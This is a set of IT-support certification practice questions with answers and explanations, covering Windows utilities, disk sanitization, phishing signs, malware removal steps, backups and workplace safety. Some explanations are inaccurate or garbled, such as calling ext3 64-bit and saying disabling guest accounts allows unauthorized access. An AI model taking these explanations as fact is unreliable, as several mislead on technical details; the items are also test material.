Device Manager (devmgmt.msc) allows the administrator to view and edit the properties of installed hardware. Users can change hardware configuration settings, update drivers, or remove/disable devices.
The System Information (msinfo32.exe) tool produces a comprehensive report about the system’s hardware and software components.
A technician destroys disks by putting holes through them and smashing them with a hammer. What is this method?
Erasing/wiping
Degaussing
Drilling
Incinerating
Drilling
Drilling is when a disk needs to be destroyed; IT uses a drill or hammer. The goal is to execute the drive unusable.
Degaussing is when a hard disk is exposed to a powerful electromagnet that disrupts the magnetic pattern that stores the data on the disk surface.
Incinerating is when the disk is exposed to high heat to melt its components. It is performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.
Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner.
A security awareness trainer spends a good portion of the training class talking about phishing, given its popularity as an attack vector. Phishing campaigns are getting more sophisticated, so the trainer is helping the class learn how to identify a phishing email. Which of the following is an indicator of phishing? (Select all that apply.)
SELECT ALL THAT APPLY
Inconsistent sender and reply to addresses
No signature
Urgency
Disguised links
Inconsistent sender and reply to addresses
Urgency
Disguised links
Many phishing emails have a sense of urgency so that the recipient will act now or else it will be too late. In business, this could be an email that appears to be from the boss, who needs something right away.
The email sender’s address (the FROM address) should be consistent with the REPLY-TO address.
Links in phishing emails can be disguised. For example, a link that appears to be www.microsoft.com, reveals a very different URL, such as www.maliciouslink.com, when the cursor hovers over the link.
An email with no signature is not an indicator of phishing.
Microsoft provides a repository of information about threats that Windows Defender discovers. What is the name of the repository?
Windows Recovery Environment
Microsoft Knowledge Base
Microsoft 365
Windows Hello
Microsoft Knowledge Base
Windows Knowledge Base can be used to obtain additional information about threats discovered by Windows Defender Antivirus. The Knowledge Base has more than 150,000 articles created by support professionals about topics such as indicators for manual verification, the impact of infection, and the likelihood of other systems being compromised.
Microsoft 365 is an office productivity and data storage suite operated by Microsoft.
Windows Hello is a feature that supports passwordless sign-in for Windows.
Windows Recovery Environment (WinRE) is a troubleshooting feature that installs a command shell environment to a recovery partition to remediate boot issues.
An employee uses an option to ask for help from a technician with an invitation file protected by a passcode. What is this option?
RDP
RMM
VPN
MSRA
MSRA
Microsoft Remote Assistance (MSRA) allows a user to ask for help from a technician or co-worker by an invitation file protected by a passcode. The helper opens the invitation file to connect to the remote system.
Remote Monitoring and Management (RMM) tools are principally designed for use by managed service providers (MSPs).
Remote Desktop Protocol (RDP) implements terminal server and client functionality. RDP authentication and session data are always encrypted.
A virtual private network (VPN) establishes a tunneled link that joins a local computer to a remote network. Establish a VPN link and then use a remote desktop to connect to a host on the private network.
A helpdesk technician is helping a user experiencing printer problems. After several troubleshooting steps, the technician thinks the user may have installed the wrong driver. Where can they go to install a different one?
Indexing Options
Device Manager
Programs and Features
Network and Sharing
Device Manager
Device Manager allows users to view and edit the properties of installed hardware. They can change hardware configuration settings, update drivers, or remove/disable devices.
The Programs and Features Control Panel applet is the legacy software management interface. Users can use it to install and modify desktop applications and Windows Features.
Network and Sharing Center is a Control Panel applet that shows status information. Printer drivers will not be located here.
Search is also governed by settings configured in the Indexing Options applet. A corrupted index is a common cause of search problems.
A user is conscientious about security after hearing about breaches in the news. The user wants to see if they are up to date on patches for their Apple computer. Where should the user go to check?
Displays
Printers & Scanners
System Preferences
App Store
App Store
The App Store checks daily for new updates/patches and releases of installed apps in macOS. If a new version is available, a notification will be shown against the App Store icon in the dock.
The Displays preference pane allows users to scale the desktop, set the brightness level, calibrate to a given color profile, and configure Night Shift settings to make the display adapt to ambient light conditions.
Use the Printers & Scanners preference pane to add and manage print and scan devices.
Users can manage network settings either from the Status menu on the right-hand side of the menu bar or via System Preferences.
A server administrator wants to run the latest technologies. What technology should the administrator start using which will replace the New Technology File System (NTFS)?
ext3
ReFS
APFS
exFAT
ReFS
Resilient File System (ReFS) is being developed to replace NTFS. ReFS is only available for Pro for Workstations and Enterprise editions and cannot currently be used for the boot volume.
Most Linux distributions use some version of the extended (ext) file system to format partitions on mass storage devices. ext3 is a 64-bit file system with journaling support.
Where Windows uses NTFS and Linux typically uses ext3 or ext4, Apple Mac workstations and laptops use the proprietary Apple File System (APFS).
exFAT is a 64-bit version of FAT designed for use with removable hard drives and flash media.
A user uses a scripting language based on Microsoft’s Visual Basic programming language. Which of the following extensions is used?
.py
.vbs
.js
.bat
.vbs
.vbs is the VBScript file extension. VBScript predates PowerShell. The wscript.exe interpreter executes VBScript by default.
.bat is the Windows batch file extension. A shell script for the basic Windows CMD interpreter is often described as a batch file.
.js is the JavaScript file extension. JavaScript is a scripting language designed to implement interactive web-based content and web applications. Most web servers and browsers are configured with a JavaScript interpreter.
.py is the Python file extension. Python is a general-purpose scripting and programming language that can develop both automation scripts and software applications.
A server administrator locks down security on their golden client image but is concerned about potentially breaking things in the environment. They decided to set up a test image for test users in various departments before full implementation. What should the administrator use to make individual configuration changes to the image?
services.msc
shell:startup
gpedit.msc
regedit.exe
regedit.exe
The Windows registry provides a remotely accessible database for storing operating system, device, and software application configuration information. The administrator can use the Registry Editor (regedit.exe) to view or edit the registry.
The Group Policy Editor (gpedit.msc) provides a more robust means of configuring many Windows settings than editing the registry directly.
The Services console (services.msc) starts, stops, and pauses processes running in the background. In order to make configuration changes, regedit.exe in this group of options would be used.
The Startup tab lets administrators disable programs added to the Startup folder (type shell: startup at the Run dialog to access this).
What allows a user to download from a vendor’s website and select the correct patch for their device’s make and model?
Encryption setting
Change default password
Firmware updates
Physical placement
Firmware updates
Firmware updates are important because it allows the user to fix security holes and support the latest security standards.
Change the default password to secure the administrator account. Choose a new strong password of 12 characters or more. This is more secure than leaving the default where someone may be able to easily access.
Physical placement of any type of router or network appliance should be made to a secure location. A non-malicious threat actor could damage or power off an appliance by accident.
Encryption settings allow users to set the authentication mode.
Which of the following will block untrusted application sources from running?
OS updates
Firewall
Failed login attempts
Anti-malware
Anti-malware
Anti-malware applications designed for mobile devices tend to work more like content filters to block access to known phishing sites and block adware/spyware activity by apps.
Failed login attempts mean that the device locks for a set period if an incorrect passcode or bio gesture is used; this deters attempts to guess the passcode or use a spoofed biometric.
OS updates are as critical as it is for a desktop computer. The install base of the iOS is generally better at applying updates because of the consistent hardware and software platform.
Firewall applications for mobile devices can monitor app activity and prevent connections to ports or IP addresses.
An administrator wants to listen to music through headphones to help with productivity during work. However, the administrator is having issues connecting the headphones via Bluetooth. Where should they go first to look?
Network
System
Devices
Personalization
Devices
The Devices settings pages contain options for input devices (mice, keyboards, and touch), print/scan devices, and adding and managing other peripherals attached over Bluetooth or USB.
The System Settings page in the Settings app presents options for configuring input and output devices, power, remote desktop, notifications, and clipboard (data copying).
Network & Internet is the modern settings app used to view network status, change the IP address properties of each adapter, and access other tools.
The Personalization settings allow users to select and customize themes, which set the appearance of the desktop environment.
What is this called when antivirus software scans a file before allowing or preventing it from opening?
Scheduled scanning
Quick scanning
On-access scanning
Smart scanning
On-access scanning
On-access scanning is when the antivirus software intercepts an operating system call to open a file and scans the file before allowing or preventing it from being opened. Most security software is now configured to scan on-access.
A scheduled scan is run at a determined time and frequency. All security software supports scheduled scans.
A smart scan scans a computer’s critical areas, like system memory, hidden services, boot sectors, auto-run entries, registry keys, and important operating system files and folders.
A quick scan looks at all the locations where there could be malware, such as registry keys and known Windows startup folders.
A user notices that their device has a leaking component and needs to take careful measures to minimize any risk and discard the approved component at the proper waste facility. Which of the following disposal is this?
Fuse
Toner
Device
Battery
Battery
Batteries must be disposed of through an approved waste facility. Swollen or leaking batteries from devices must be handled carefully and stored within appropriate containers. Gloves and safety goggles may minimize the risk of burns from the corrosive material.
Recycling used toner cartridges is offered at most vendors. The products in toner powder are not classified as hazardous to health.
Device disposal can be donated, and if it can not be reused, it must be disposed of through the approved waste facility.
An electrical device has a fuse appropriate to its maximum current. If the current increases past the fuse capacity, the fuse will blow. However, if the fuse fitted is rated too low, the fuse will blow too easily.
A company is conducting live meetings between two or more applicants at different sites. What is this called?
Desktop management
File transfer
Screen-sharing
Videoconferencing
Videoconferencing
Some web-conferencing and videoconferencing software, like Microsoft Teams and Zoom, provides a screen-sharing client that participants may control.
Screen-sharing is software that is designed to work over HTTPS across the internet. This is secure because the connection is encrypted but also easier to implement as it does not require special firewall rules.
Desktop management suites are designed for deployment by a single organization and focus primarily on access control and authorization.
With file transfer, users can choose a file-sharing protocol that can be used across all connected hosts. It allows configuring permissions on the share and provisioning user accounts that are recognized by both the server and client.
An administrator is backup chaining a database with the type of backup that utilizes a moderate time and storage requirement. What type of backup is this?
Full with differential
Retention
Frequency
Full with incremental
Full with differential
Full with differential means that the chain starts with a full backup and then runs differential jobs that select new files and files modified since the original full job.
Full with incremental means that the chain starts with a full backup and then runs incremental jobs that select only new files and files modified since the previous job.
Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.
Retention is the period that any given backup job is kept for. Short-term retention is important for version control and for recovering from malware infection.
A technician is tasked to figure out why a user’s Gmail app will not update on their mobile phone. The technician knows several reasons that would cause this to occur. Which of the following would be one of the reasons for this problem?
GPS
Bluetooth
Storage
Accelerometer
Storage
If an app fails to update, there may be insufficient storage space (Gmail uses a lot of storage). It could also be that the update is incompatible with the existing operating system version, or there is no internet connection.
An accelerometer is a technology that detects when a device changes position and adjusts the screen orientation appropriately.
Bluetooth is used to connect peripheral devices to PCs and mobiles and to share data between two systems.
Global Positioning System (GPS) is a means of determining a receiver’s position based on information received from satellites.
What tool will distinguish client accounts and provide support for recording and reporting billable support activity?
RMM
RDP
VPN
VNC
RMM
Remote Monitoring and Management (RMM) tools are principally designed for use by managed service providers (MSPs).
Remote Desktop Protocol (RDP) implements terminal server and client functionality. RDP authentication and session data are always encrypted.
A virtual private network (VPN) establishes a tunneled link that joins a local computer to a remote network. Establish a VPN link and then use a remote desktop to connect to a host on the private network.
Virtual network computing (VNC) is a freeware product with similar functionality to RDP. It works over TCP port 5900. Not all versions of VNC support connection security.
A server administrator tests connectivity between two statically assigned servers in a forest with different domains. What should they check first in this case?
Subnet mask
Gateway
DNS settings
IP addressing scheme
DNS settings
Because the servers are on different domains, DNS should be checked first. The administrator probably uses the hostname instead of the fully qualified domain name (FQDN). If not specified, the host will likely try to resolve to the same domain.
The IP addressing scheme would not be part of the troubleshooting process because the administrator relies on DNS resolution.
The subnet mask could be an issue, but the most likely issue is the different domains.
The gateway could also be configured improperly, although if that were the case, they would not be able to reach out at all, not just the one other server.
A researcher calls the help desk complaining of slow computer performance. When the technician arrives and probes for clues, the researcher explains that they frequently run multiple programs simultaneously and have a significant number of browser tabs open to aid with their research. Which of the following solutions should speed up the computer’s performance?
Run System Restore.
Add RAM.
Have the user run the computer in Safe Mode with Networking.
Reset Windows.
Add RAM.
Running multiple programs and having a lot of browser tabs open consumes a lot of RAM. Since the researcher needs to continue this practice to do their job, adding more RAM should improve performance.
System Restore is mostly used to roll back a configuration change, such as installing or updating. It does not help with memory-constrained performance.
Safe Mode is a troubleshooting environment that loads only the basic drivers and services required to start the system. While running Safe Mode with Networking allows internet access, the environment is not conducive to resource-consuming programs.
Resetting Windows using Reset this PC restores the computer’s factory default settings and removes all applications.
A company’s IT support specialist is ready to start recommissioning a system as part of the malware removal process. What is the last step before removing the computer from quarantine?
Antivirus scan
Create a fresh restore point.
Verify DNS configuration.
Re-enable System Restore.
Antivirus scan
Before removing a computer system from quarantine, the final step is to run another antivirus scan to make sure the system is clean.
Creating a new restore point (or system image) is one component of recommissioning and is done after re-enabling the System Restore but before running a final antivirus scan.
Re-enabling the System Restore is the beginning of the recommissioning process, along with re-enabling any disabled automatic backups.
Verifying Domain Name System (DNS) configuration to prevent reinfection is part of recommissioning, but it comes before the final antivirus scan.
A user is only able to read data on the file. What account management policy is this?
Change default administrator account.
Disable guest accounts.
Restrict login times.
Restrict user permission.
Restrict user permission.
Restrict user permission means some networks have complex requirements for assigning rights. However, the basic principle is that the number of accounts with administrator privileges should be as few as possible.
These default accounts have practical limitations and consequently are the ultimate target for threat actors. Any use of the default administrator account must be logged and accounted for.
Disabling guest accounts allow unauthorized access to the computer and may provide some sort of network access too. It is only enabled to facilitate password-less file sharing in a Windows workgroup.
Restrict login times are typically used to prevent an account from logging in at an unusual time of the day or night or during the weekend.
A developer, working at Microsoft, is helping to develop the latest and greatest user interface for Windows. The developer is assigned to the team that works on the user interface’s top level. What will the developer be working on?
Device Manager
Shortcut icons
File Explorer
Desktop
Desktop
The top level of the user interface is the desktop displayed when Windows starts and the user logs on. Windows 11 makes several changes to the desktop style. Notably, it center-aligns the taskbar and introduces another design for the Start menu.
The desktop contains the Start menu, taskbar, and shortcut icons. These are all used to launch and switch between applications.
File management is a critical part of using a computer. As a computer support professional, users will often have to assist users with locating files.
Device Manager provides an advanced management console interface for managing system and peripheral devices.
What method uses the process of immersing the device into a high-intensity magnetic field that leaves the object magnetically impartial?
Incinerating
Degaussing
Erasing/wiping
Certificate of destruction
Degaussing
Degaussing is when a hard disk is exposed to a powerful electromagnet that disrupts the magnetic pattern that stores the data on the disk surface.
Incinerating is when the disk is exposed to high heat to melt its components. This should be performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.
Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner.
A certificate of destruction shows the make, model, and the serial number of each drive that was handled, plus the date of destruction and how it was destroyed.
A pet store owner receives an email from their bank with a special financing offer. The owner clicks on the attachment, but it does not open. Later that day, when the owner returns to their computer, it is running very slowly and will not connect to the internet. By the time the IT consultant arrives, the computer has locked up. Which of the following is the best action for the IT consultant given the existing conditions?
Check the Wi-Fi connection.
Enable SMART.
Run CHKDSK.
Run an antivirus scan.
Run an antivirus scan.
The symptoms in this scenario are consistent with a malware infection, even though it could be other causes. As such, running an antivirus scan is the appropriate first step.
CHKDSK is a command-line tool that checks for hard disk errors and can repair them. Problems with the hard disk could cause all of the listed symptoms, except internet access. Moreso, CHKDSK takes a long time to run, so it would not be the best first step in this case.
SMART (Self-Monitoring, Analysis, and Reporting Technology) is a hard disk monitoring program. It is an alerting tool, not a diagnostic tool.
Disconnected Wi-Fi could explain the inability to access the internet, but nothing else in this scenario.
Employees are expected to stay updated on skills and knowledge to cope with changing threat types. Which of the following covers this?
Recovery mode
Security-awareness training
Anti-malware
OS reinstallation
Security-awareness training
Security-awareness training is usually delivered to employees at all levels, including end-users, technical staff, and executives. The training includes anti-phishing, software firewalls, passwords, malware threats, and more.
Anti-malware is computer software used to avoid, identify, and eliminate malware. Anti-malware is like antivirus software but for more up-to-date malware.
Recovery mode is the step-by-step processing of manual removal to disable persistence mechanisms and reconfigure the system to its secure baseline.
OS reinstallation is when antivirus software is not able to recover data from infected files, and a user must complete a system restore.
An employee uses a cryptographic contactless technique that allows access to a building. What is this technique?
Palmprint scanner
Alarm system
Badge reader
Magnetometer
Badge reader
Badge readers are a type of electronic lock that works with a hardware token rather than a PIN.
A magnetometer is a type of metal detector often deployed at airports and in public buildings to identify concealed weapons or other items.
Alarm systems are designed to detect intrusion into a building or home. Alarms systems include motion sensors, video surveillance, and lighting.
A palmprint scanner is a contactless-type of camera-based scanner that uses visible and infrared light to record and validate the unique pattern of veins and other features in a person’s hand. Unlike facial recognition, the user must make an intentional gesture to authenticate.
According to CompTIA’s seven-step best practices procedure for malware removal, which of the following correctly lists the first three steps?
- Disable System Restore. 2. Quarantine infected systems. 3. Create a restore point.
- Quarantine infected systems. 2. Update anti-malware software. 3. Disable System Restore.
- Investigate and verify malware symptoms. 2. Quarantine infected systems. 3. Disable System Restore.
- Update anti-malware software. 2. Disable System Restore. 3. Quarantine infected systems.
1. Investigate and verify malware symptoms. 2. Quarantine infected systems. 3. Disable System Restore.
In order to remedy the issue, the first few steps in the correct order are: 1. Investigate and verify malware symptoms, 2. Quarantine infected systems, 3. Disable System Restore.
Steps 1 and 2 are incorrect: Quarantine infected systems is step 2 and Update anti-malware software is step 4.
Steps 1 and 3 are incorrect: Disable System Restore is step 3 and Create a restore point is step 6.
All steps are incorrect: Update anti-malware software is step 4, Disable System Restore is step 3, and Quarantine infected systems is step 2.
A penetration tester targeted top-level executives during a test by sending out phishing emails. They received their first shell when the first executive opened the attachment in the phishing email. Once the penetration tester connects to the executive’s computer, what command will tell them the location of where their shell landed?
ls
cp
pwd
mv
pwd
pwd “prints” the working directory, though “printing” will typically mean “display on the terminal,” unless stdout is redirected. The working directory is important because commands will default to the working directory without specifying a path.
ls lists the contents of a directory similar to dir at the Windows command prompt. Popular parameters include -l to display a detailed (long) list and -a to display all files, including hidden or system files.
The mv command is used to move files from one directory to another or rename a file.
cp is used to create a copy of files either in the same or different directory with the same or different name.
A technician makes sure that there is no faulty electrical equipment that can pose a risk and places extinguishers nearby. What is this called?
Electrical fire safety
Equipment grounding
Proper power handling
Fuse
Electrical fire safety
Electrical fire safety ensures that equipment is properly stored and away from any flammable material and electrical wires do not start a fire.
Electrical equipment must be grounded. The power plug connects devices such as PCs and printers to the building ground.
Proper power handling is done with the correct training. PC power supply units can carry dangerously high levels of voltage. Disconnection of power should be done before repairing a PC.
An electrical device has a fuse appropriate to its maximum current. If the current increases past the fuse capacity, the fuse will blow. However, if the fuse fitted is rated too low, the fuse will blow too easily.
A server administrator has not used the command line in quite some time and is trying to remember what will help them with commands and how to use them. Which of the following should the administrator use?
winver
ipconfig
ping
/?
/?
The command prompt includes a rudimentary help system. If the administrator types help at the command prompt and then press ENTER, a list of available commands is displayed. They can also display help on a particular command by using the /? switch.
The winver command reports version information. Users will often need to use this for support.
Used without switches, ipconfig displays the IP address, subnet mask, and default gateway (router) for all network adapters to which TCP/IP is bound.
The ping command utility is a command-line diagnostic tool used to test whether a host can communicate with another host on the same network or on a remote network.
A company uses an element that reminds users when logging in to the company’s device of the current software version. What is this called?
Assigned users
Acceptable use policy
Knowledge base
Splash screen
Splash screen
The splash screen is a graphic design element consisting of a window containing an image, logo, and the current software version.
Knowledge base (KB) is a repository for articles that answer frequently asked questions (FAQs) and document common or significant troubleshooting scenarios and examples. Each inventory record could be tagged with a cross-reference to an internal knowledge base to implement self-service support and assist technicians.
Assigned users are when hardware assets such as workstations, laptops, smartphones, tablets, and software licenses might be assigned to individual user accounts.
Acceptable use policy (AUP) sets out what someone can use a particular service or resource for.
An administrator automates the creation of folders during a Windows install process. Which command should they use in their script?
rmdir
dir
cd
md
md
To create a directory, use the MD command. For example, to create a directory called Data in the current directory, type MD Data.
To delete an empty directory, enter rd Directory or rmdirDirectory. If the directory is not empty, users can remove files and subdirectories using the /s switch.
The cd command sets the focus to a different working directory. Users can change to any directory by entering the full path.
Use the dir command to list the files and subdirectories from the working drive and directory or a specified path.
A manager for a large corporation is in charge of client machines and is currently undergoing a lifecycle hardware refresh. They want to optimize the machines to be powerful enough to run applications. The manager also wants to be sure that they are not underpowered either. What can the manager use to determine CPU optimization?
User time
Pages/sec
Disk queue length
Privileged time
Privileged time
If privileged time is much higher than user time, the central processing unit (CPU) is likely underpowered (it can barely run Windows core processes efficiently).
If overall processor time is very high (over 85% for sustained periods), it can be helpful to compare these. Privileged time represents system processes, whereas user time is software applications.
If the disk queue length increases and disk time is high, then the manager has a disk problem.
Pages per second are the number of pages read from or written to disk to resolve hard page faults, which means memory moves processes to the page file.
A low battery charge can cause several different problems to occur on a mobile device. Which of the following issues could stem from a low battery? (Select all that apply.)
SELECT ALL THAT APPLY
Weak Bluetooth signal
Autorotation stops
Weak Wi-Fi signal
Lockout
Weak Bluetooth signal
Weak Wi-Fi signal
Searching for wireless signals, such as Wi-Fi, consumes a lot of battery power, so if the device’s battery is low, it may not have enough power to search for a strong signal.
Searching for wireless signals, such as Bluetooth, consumes a lot of battery power, so if the device’s battery is low, it may not have enough power to search for a strong signal.
A lockout occurs after a maximum number of failed sign-in attempts.
A low battery charge would not cause autorotation to stop. When a mobile device screen stops autorotating, either the rotation lock is enabled or there is a hardware issue.
An administrator in charge of user endpoint images wants to slipstream and use image deployment. Which boot method would best support this?
Network
Internet
Optical
Internal hard drive
Network
Network boot setup means connecting to a shared folder containing the installation files, which could be slipstreamed or use image deployment.
A computer that supports network boot could also be configured to boot to set up over the internet. To set that up the local network’s DHCP server must be configured to supply the DNS name of the installation server.
Historically, most attended installations and upgrades were run by booting from optical media (CD-ROM or DVD).
Once the OS has been installed, the administrator will usually want to set the internal hard drive as the default (highest priority) boot device and disable any other boot devices.
A server administrator hears weekly about companies breached by malware. What is the most significant impact the server administrator is likely worried about?
Licensing
Training
Applications
Support
Applications
When selecting applications for installation on desktops, proper security considerations need to be made regarding potential impacts to the device (computer) and the network.
With support, the software might be available with paid-for support to obtain updates, monitor and fix security issues, and provide technical assistance.
With training, complex apps can have a substantial and expensive user-training requirement which can be an ongoing cost as new versions can introduce interface or feature changes.
With licensing, commercial software must be used within the constraints of its license but is likely to restrict the number of devices on which the software can be installed.
What type of encryption does WPA2 use? (Select all that apply.)
SELECT ALL THAT APPLY
AES
WPA3
TKIP
MFA
AES
TKIP
Advanced encryption standard (AES) is the standard encryption used by WPA2 and the strongest encryption standard to use by Wi-Fi.
Temporal key integrity protocol (TKIP) tries to mitigate the various attacks against WEP developed by producing a new 128-bit encryption key for every packet sent on the network.
Wi-Fi protected Access (WPA3) uses passphrase-based group authentication of stations in private mode, and it changes the method by which this secret is used to agree with session keys. The simultaneous authentication of equals (SAE) protocol replaces the 4-way handshake.
Multifactor authentication (MFA) allows the machine to establish a trust relationship and create a secure tunnel to transmit the user credentials or perform smart card authentication without a user password.
A user logs into a computer and uses a camera that records a 3-D image with its infrared sensor to mitigate attempts to use a photo to spoof the authentication mechanism. What is this called?
Gpupdate
Facial recognition
Fingerprint
SSO
Facial recognition
Facial recognition is the bio gesture that uses a webcam to scan the unique features of the user’s face.
A fingerprint is the type of bio gesture authentication that uses a sensor to scan the unique features of the user’s fingerprint.
Single sign-on (SSO) means that a user authenticates once to a device or network to access multiple applications or services. The advantage of SSO is that each user does not have to manage multiple digital identities and passwords.
Gpupdate is a policy applied at sign-in and refreshed periodically, which is normally every 90 minutes. The gpupdate command is used to immediately apply a new or changed policy to a computer and account profile.
A user needs to install a desktop application and use an application store that is reputable. What type of vendor is this store?
Untrusted source
Trusted source
Secure connection
Browser sign-in
Trusted source
As the browser is a security-critical type of software, it is particularly important to use a trusted source, such as an app store. Likewise, if installed as a desktop application, the user should ensure using a reputable vendor.
An untrusted source is when an installer cannot be verified through a digital signature or has been a security risk and is likely to expose the user to unwanted adverts.
A secure connection validates the host’s identity running a site and encrypts communications to protect against snooping.
Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.
What technique is often used to exhibit fake antivirus and security warnings or other malicious advertising?
Private browsing mode
Untrusted source
Trusted source
Pop-ups
Pop-ups
Pop-ups can be used by malicious actors to scare a user with fake antivirus or security warnings.
An untrusted source is when an installer cannot be verified through a digital signature or has been a security risk and is likely to expose the user to unwanted adverts. Some untrusted sources do not block ads or have pop-up blockers.
As the browser is a security-critical type of software, it is particularly important to use a trusted source, such as an app store. Likewise, if installed as a desktop application, the user should ensure using a reputable vendor.
Private browsing mode disables the caching features of the browser so that no cookies, browsing history, form fields, passwords, or temp files will be stored when the session is closed.
A network administrator troubleshoots domain name system (DNS) issues that a particular user is having. Which of the following utilities will help the administrator troubleshoot DNS specifically?
tracert
pathping
gpupdate
nslookup
nslookup
If the administrator identifies or suspects a problem with name resolution, they can troubleshoot DNS with the nslookup command, either interactively or from the command prompt.
The gpupdate command is used to immediately apply a new or changed policy to a computer and account profile.
The tracert command-line utility is used to trace the path a packet of information takes to get to its target.
As an alternative to tracert, the pathping command performs a trace and then pings each hop router a given number of times for a given period.
A telltale sign of a malware infection is when changes occur to system files. Which of the following is likely the result of malware-induced changes to system files? (Select all that apply.)
SELECT ALL THAT APPLY
Known-good files with expired certificates
Files that are missing or renamed
Additional files with names similar to authentic system files, such as scvhost.docx or ta5kmgr.xlsx
Files with date stamps and file sizes that are different from known-good versions
Files that are missing or renamed
Files with date stamps and file sizes that are different from known-good versions
System files are an attractive target for malware because renaming or deleting them can wreak havoc on the operating system.
Hackers will alter the size of system files to hide malware or change the date stamp to cover their tracks.
While malware will add additional files with names almost the same as authentic system files, the extensions .docx and.xlsx represent Word and Excel files, respectively. These are data files, not system files. System files have extensions such as .dll and .sys.
System files do not have certificates. Certificates are a security tool used by websites to prove the server is trusted.
A user’s phone begins to act strangely, with apps responding slowly and pop-up ads appearing frequently. When the user calls the help desk and explains the issues, the technician says it sounds like malware. What other symptoms would be common to a malware infection on a mobile phone? (Select all that apply.)
SELECT ALL THAT APPLY
Increased Response Times
Fake security warnings
Redirection
APK sideloading
Fake security warnings
Redirection
Fake security warnings are a common symptom of malware infection. Scareware uses these to persuade users to install an app or give a Trojan app additional permissions.
Redirection attacks are a common symptom, where malware corrupts the Domain Name System (DNS) and search provider to force users to spoofed sites. This might disrupt access to legitimate sites, generate certificate warnings, and cause slow network performance.
APK (Android Package) sideloading refers to downloading apps for Android phones from a source other than Google’s Play store.
A lockout occurs after a maximum number of failed sign-in attempts.
What technique is used on hard drives that reset them to factory condition and the hard drives only contain the information necessary to interact with a file system?
Erasing/wiping
Certificate of destruction
Low-level formatting
Third-party vendor
Low-level formatting
A low-level formatting tool resets a disk to its factory condition. Most of these tools will now incorporate some sanitize function. Secure erase (SE) and instant secure erase (ISE) are two functions under this tool.
Third-party vendors may use overwriting or crypto-erase and issue a certificate of recycling rather than destruction.
A certificate of destruction shows the make, model, and the serial number of each drive that was handled, plus the date of destruction and how it was destroyed.
Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner.
An IT specialist found a damaging package on a client’s computer disguised as something else. What did the specialist find?
Spyware
Virus
Trojan
Boot sector virus
Trojan
Trojans are malware concealed within an installer package for software that appears to be legitimate.
Viruses are concealed within the code of an executable process image stored as a file on a disk.
Boot sector viruses can infect the boot sector code or partition table on a disk drive. When the disk is attached to a computer, the virus hijacks the bootloader process to load itself into memory.
Spyware is malware that can perform browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening arbitrary pages at startup, adding bookmarks, and more.
The IT department determines that the phone belonging to the company’s vice president suffers a compromise and that the personal and corporate data contained on the phone has leaked. Which of the following should the IT team do next?
Wipe the phone.
Quarantine all devices that could be connected to the leak.
Reboot the phone.
Run an antivirus scan.
Quarantine all devices that could be connected to the leak.
If any personal or corporate data is leaked from a mobile device, each device that could have been a source for the files must be quarantined and investigated as a possible source of the breach.
Rebooting a phone generally solves an unresponsive or frozen system, malfunctioning app, or slow performance.
An antivirus scan would not be the next step in this scenario, as quarantining and investing in the source of the breach is the priority.
Wiping the phone will remove all data from the device, which is counterproductive to investigating the source of the breach.
A digital forensics expert investigates a laptop that was not completely powered down. They are looking for a hibernation file on the local hard drive. Which power mode would perform this?
Modern standby
Hibernate
Standby
Hybrid sleep
Hibernate
Hibernate mode suspends to disk. It saves any open but unsaved file data in memory to disk (as hiberfil.sys in the root of the boot volume) and then turns the computer off, which is also referred to as ACPI mode S4.
A computer creates a hibernation file in the hybrid sleep mode and then goes into the standby state, referred to as hybrid sleep mode.
Modern standby utilizes a device’s ability to function in an S0 low-power idle mode to maintain network connectivity without consuming too much energy.
Standby suspends to RAM, which cuts power to most devices but maintains power to the memory, also called ACPI modes S1–S3.
A technician sets up a company’s network and uses a method that lets employees know which network is the company’s network. What is this called?
UPnP
SSID
DHCP reservation
Firmware updates
SSID
Service set ID (SSID) is a simple, case-sensitive name that users identify the WLAN. The factory configuration uses a default SSID that is typically based on the device brand or model, which should be changed so users will recognize the network.
The universal plug-and-play (UPnP) framework sends instructions to the firewall with the correct configuration parameters to allow applications to work.
The Dynamic Host Configuration Protocol (DHCP) reservation means that the DHCP server always assigns the same IP address to the host. A user can usually choose which IP address this should be.
Firmware updates are important because it allows the user to fix security holes and support the latest security standards.
A server administrator looks at which Linux supports file systems to show all available options. Which of the following are supported by Linux? (Select all that apply.)
SELECT ALL THAT APPLY
APFS
NTFS
ext4
FAT32
ext4
FAT32
Most Linux distributions use some version of the extended (ext) file system. ext4 delivers better performance than ext3 and would usually represent the best choice for new systems.
Linux can also support FAT/FAT32 (designated as VFAT). Additional protocols such as the Network File System (NFS) can mount remote storage devices into the local file system.
Where Windows uses NTFS and Linux typically uses ext3 or ext4, Apple Mac workstations and laptops use the proprietary Apple File System (APFS).
The New Technology File System (NTFS) is a proprietary file system developed by Microsoft for use with Windows.
A security analyst notices a critical incident that has a widespread effect on customers that can eventually involve a potential data breach. The analyst creates a ticket with the vendor and sets the importance in order to trigger a faster response time. What describes what attribute of the ticket the analyst set?
Categories
Severity levels
Escalation levels
Problem resolution
Severity levels
The severity level is a way of classifying tickets into priority order. Severity levels are not over-complex. There are three severity levels based on impact: critical incidents, major incidents, and minor incidents.
Categories and subcategories group related tickets together, useful for assigning tickets to the relevant support section or technician and for reporting and analysis.
Escalation levels occur when an agent cannot resolve the ticket. The support team can be organized into tiers to clarify escalation levels.
Problem resolution sets out the plan of action and documents the successful implementation and testing of the plan and full system functionality.
An employee is working with a substance that can potentially harm them. Which of the following should they use? (Select all that apply.)
SELECT ALL THAT APPLY
Air filter mask
Safety goggles
Fuse
Lifting techniques
Air filter mask
Safety goggles
Safety goggles are used to minimize the risk of burns from corrosive materials such as broken batteries, cellphones, tablets, or irritation from particles such as toner or dust.
An air filter mask that fits over the mouth and nose is a recommended face covering when working with compressed air, toner spills, or working in a dusty environment. An air filter mask will not protect the eyes.
Lifting techniques are included in safety handbooks; the guidance sets out to show employees lifting heavy objects incorrectly can cause muscle strains, back injuries, and damage the object.
An electrical device has a fuse appropriate to its maximum current. If the current increases past the fuse capacity, the fuse will blow. However, if the fuse fitted is rated too low, the fuse will blow too easily.
